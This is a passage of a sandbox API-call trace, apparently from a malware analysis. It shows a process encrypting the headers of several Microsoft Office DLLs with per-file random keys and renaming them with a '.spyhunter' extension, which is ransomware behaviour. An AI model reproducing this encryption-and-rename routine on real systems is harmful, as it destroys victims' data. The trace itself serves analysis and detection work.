lpNumberOfBytesWritten=0x57e73c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e73c*=0x30, lpOverlapped=0x0) returned 1 [0165.908] CloseHandle (hObject=0xb0) returned 1 [0165.908] GetProcessHeap () returned 0x2c0000 [0165.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.908] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\URLREDIR.DLL.spyhunter") returned 75 [0165.908] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\URLREDIR.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\urlredir.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\URLREDIR.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\urlredir.dll.spyhunter")) returned 1 [0165.909] GetProcessHeap () returned 0x2c0000 [0165.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.909] GetProcessHeap () returned 0x2c0000 [0165.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0165.909] GetProcessHeap () returned 0x2c0000 [0165.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e06188 | out: hHeap=0x2c0000) returned 1 [0165.910] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e778 | out: pbBuffer=0x57e778) returned 1 [0165.910] GetProcessHeap () returned 0x2c0000 [0165.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0165.910] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e770*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e770*=0x30) returned 1 [0165.910] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVB.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\umlvb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0165.918] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVB.DLL") returned 62 [0165.918] StrStrW (lpFirst="UMLVB.DLL", lpSrch=".txt") returned 0x0 [0165.918] GetProcessHeap () returned 0x2c0000 [0165.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0165.918] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e734, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e734*=0x2800, lpOverlapped=0x0) returned 1 [0165.921] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.921] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e734, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e734*=0x2800, lpOverlapped=0x0) returned 1 [0165.921] GetProcessHeap () returned 0x2c0000 [0165.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0165.921] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.921] WriteFile (in: hFile=0xb0, lpBuffer=0x57e774*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e734, lpOverlapped=0x0 | out: lpBuffer=0x57e774*, lpNumberOfBytesWritten=0x57e734*=0x4, lpOverlapped=0x0) returned 1 [0165.922] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e734, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e734*=0x30, lpOverlapped=0x0) returned 1 [0165.922] CloseHandle (hObject=0xb0) returned 1 [0165.923] GetProcessHeap () returned 0x2c0000 [0165.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.928] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVB.DLL.spyhunter") returned 72 [0165.928] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVB.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\umlvb.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVB.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\umlvb.dll.spyhunter")) returned 1 [0165.929] GetProcessHeap () returned 0x2c0000 [0165.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.929] GetProcessHeap () returned 0x2c0000 [0165.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0165.929] GetProcessHeap () returned 0x2c0000 [0165.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec53d0 | out: hHeap=0x2c0000) returned 1 [0165.929] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e778 | out: pbBuffer=0x57e778) returned 1 [0165.929] GetProcessHeap () returned 0x2c0000 [0165.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0165.930] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e770*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e770*=0x30) returned 1 [0165.930] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\STSCOPY.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\stscopy.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0165.932] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\STSCOPY.DLL") returned 64 [0165.932] StrStrW (lpFirst="STSCOPY.DLL", lpSrch=".txt") returned 0x0 [0165.932] GetProcessHeap () returned 0x2c0000 [0165.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0165.932] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e734, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e734*=0x2800, lpOverlapped=0x0) returned 1 [0165.949] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.949] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e734, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e734*=0x2800, lpOverlapped=0x0) returned 1 [0165.949] GetProcessHeap () returned 0x2c0000 [0165.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0165.949] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.950] WriteFile (in: hFile=0xa0, lpBuffer=0x57e774*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e734, lpOverlapped=0x0 | out: lpBuffer=0x57e774*, lpNumberOfBytesWritten=0x57e734*=0x4, lpOverlapped=0x0) returned 1 [0166.000] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e734, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e734*=0x30, lpOverlapped=0x0) returned 1 [0166.000] CloseHandle (hObject=0xa0) returned 1 [0166.000] GetProcessHeap () returned 0x2c0000 [0166.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.000] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\STSCOPY.DLL.spyhunter") returned 74 [0166.000] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\STSCOPY.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\stscopy.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\STSCOPY.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\stscopy.dll.spyhunter")) returned 1 [0166.001] GetProcessHeap () returned 0x2c0000 [0166.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.002] GetProcessHeap () returned 0x2c0000 [0166.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0166.002] GetProcessHeap () returned 0x2c0000 [0166.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e05f18 | out: hHeap=0x2c0000) returned 1 [0166.009] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e770 | out: pbBuffer=0x57e770) returned 1 [0166.009] GetProcessHeap () returned 0x2c0000 [0166.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0166.009] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e768*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e768*=0x30) returned 1 [0166.010] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\OneNoteSyncPC.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\onenotesyncpc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0166.017] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\OneNoteSyncPC.dll") returned 70 [0166.017] StrStrW (lpFirst="OneNoteSyncPC.dll", lpSrch=".txt") returned 0x0 [0166.017] GetProcessHeap () returned 0x2c0000 [0166.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0166.018] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e72c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e72c*=0x2800, lpOverlapped=0x0) returned 1 [0166.141] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.142] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e72c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e72c*=0x2800, lpOverlapped=0x0) returned 1 [0166.142] GetProcessHeap () returned 0x2c0000 [0166.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0166.142] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.142] WriteFile (in: hFile=0xa0, lpBuffer=0x57e76c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e72c, lpOverlapped=0x0 | out: lpBuffer=0x57e76c*, lpNumberOfBytesWritten=0x57e72c*=0x4, lpOverlapped=0x0) returned 1 [0166.148] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e72c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e72c*=0x30, lpOverlapped=0x0) returned 1 [0166.148] CloseHandle (hObject=0xa0) returned 1 [0166.152] GetProcessHeap () returned 0x2c0000 [0166.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.152] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\OneNoteSyncPC.dll.spyhunter") returned 80 [0166.153] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\OneNoteSyncPC.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\onenotesyncpc.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\OneNoteSyncPC.dll.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\onenotesyncpc.dll.spyhunter")) returned 1 [0166.154] GetProcessHeap () returned 0x2c0000 [0166.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.155] GetProcessHeap () returned 0x2c0000 [0166.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0166.155] GetProcessHeap () returned 0x2c0000 [0166.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7e7d8 | out: hHeap=0x2c0000) returned 1 [0166.155] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e770 | out: pbBuffer=0x57e770) returned 1 [0166.155] GetProcessHeap () returned 0x2c0000 [0166.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0166.155] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e768*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e768*=0x30) returned 1 [0166.155] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONBttnIE.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\onbttnie.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0166.156] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONBttnIE.dll") returned 65 [0166.156] StrStrW (lpFirst="ONBttnIE.dll", lpSrch=".txt") returned 0x0 [0166.158] GetProcessHeap () returned 0x2c0000 [0166.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0166.158] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e72c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e72c*=0x2800, lpOverlapped=0x0) returned 1 [0166.174] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.174] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e72c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e72c*=0x2800, lpOverlapped=0x0) returned 1 [0166.174] GetProcessHeap () returned 0x2c0000 [0166.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0166.174] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.174] WriteFile (in: hFile=0xa0, lpBuffer=0x57e76c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e72c, lpOverlapped=0x0 | out: lpBuffer=0x57e76c*, lpNumberOfBytesWritten=0x57e72c*=0x4, lpOverlapped=0x0) returned 1 [0166.186] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e72c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e72c*=0x30, lpOverlapped=0x0) returned 1 [0166.186] CloseHandle (hObject=0xa0) returned 1 [0166.191] GetProcessHeap () returned 0x2c0000 [0166.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.192] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONBttnIE.dll.spyhunter") returned 75 [0166.192] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONBttnIE.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\onbttnie.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONBttnIE.dll.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\onbttnie.dll.spyhunter")) returned 1 [0166.193] GetProcessHeap () returned 0x2c0000 [0166.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.193] GetProcessHeap () returned 0x2c0000 [0166.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0166.193] GetProcessHeap () returned 0x2c0000 [0166.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e05d78 | out: hHeap=0x2c0000) returned 1 [0166.193] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e768 | out: pbBuffer=0x57e768) returned 1 [0166.193] GetProcessHeap () returned 0x2c0000 [0166.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0166.194] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e760*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e760*=0x30) returned 1 [0166.194] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\oisctrl.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\oisctrl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0166.195] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\oisctrl.dll") returned 64 [0166.197] StrStrW (lpFirst="oisctrl.dll", lpSrch=".txt") returned 0x0 [0166.197] GetProcessHeap () returned 0x2c0000 [0166.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0166.197] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e724, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e724*=0x2800, lpOverlapped=0x0) returned 1 [0166.264] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.264] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e724, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e724*=0x2800, lpOverlapped=0x0) returned 1 [0166.264] GetProcessHeap () returned 0x2c0000 [0166.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0166.264] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.264] WriteFile (in: hFile=0xa0, lpBuffer=0x57e764*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e724, lpOverlapped=0x0 | out: lpBuffer=0x57e764*, lpNumberOfBytesWritten=0x57e724*=0x4, lpOverlapped=0x0) returned 1 [0166.265] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e724, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e724*=0x30, lpOverlapped=0x0) returned 1 [0166.265] CloseHandle (hObject=0xa0) returned 1 [0166.265] GetProcessHeap () returned 0x2c0000 [0166.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.265] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\oisctrl.dll.spyhunter") returned 74 [0166.265] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\oisctrl.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\oisctrl.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\oisctrl.dll.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\oisctrl.dll.spyhunter")) returned 1 [0166.266] GetProcessHeap () returned 0x2c0000 [0166.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.266] GetProcessHeap () returned 0x2c0000 [0166.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0166.267] GetProcessHeap () returned 0x2c0000 [0166.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e05bd8 | out: hHeap=0x2c0000) returned 1 [0166.267] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e768 | out: pbBuffer=0x57e768) returned 1 [0166.267] GetProcessHeap () returned 0x2c0000 [0166.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0166.267] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e760*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e760*=0x30) returned 1 [0166.267] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAMEEXT.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\nameext.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0166.268] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAMEEXT.DLL") returned 64 [0166.268] StrStrW (lpFirst="NAMEEXT.DLL", lpSrch=".txt") returned 0x0 [0166.268] GetProcessHeap () returned 0x2c0000 [0166.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0166.268] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e724, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e724*=0x2800, lpOverlapped=0x0) returned 1 [0166.274] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.274] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e724, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e724*=0x2800, lpOverlapped=0x0) returned 1 [0166.274] GetProcessHeap () returned 0x2c0000 [0166.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0166.274] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.274] WriteFile (in: hFile=0xa0, lpBuffer=0x57e764*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e724, lpOverlapped=0x0 | out: lpBuffer=0x57e764*, lpNumberOfBytesWritten=0x57e724*=0x4, lpOverlapped=0x0) returned 1 [0166.302] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e724, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e724*=0x30, lpOverlapped=0x0) returned 1 [0166.303] CloseHandle (hObject=0xa0) returned 1 [0166.303] GetProcessHeap () returned 0x2c0000 [0166.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.303] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAMEEXT.DLL.spyhunter") returned 74 [0166.303] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAMEEXT.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\nameext.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAMEEXT.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\nameext.dll.spyhunter")) returned 1 [0166.304] GetProcessHeap () returned 0x2c0000 [0166.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.304] GetProcessHeap () returned 0x2c0000 [0166.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0166.304] GetProcessHeap () returned 0x2c0000 [0166.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e05968 | out: hHeap=0x2c0000) returned 1 [0166.304] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e760 | out: pbBuffer=0x57e760) returned 1 [0166.304] GetProcessHeap () returned 0x2c0000 [0166.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0166.304] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e758*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e758*=0x30) returned 1 [0166.305] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHTMED.EXE" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\msohtmed.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0166.314] lstrlenW 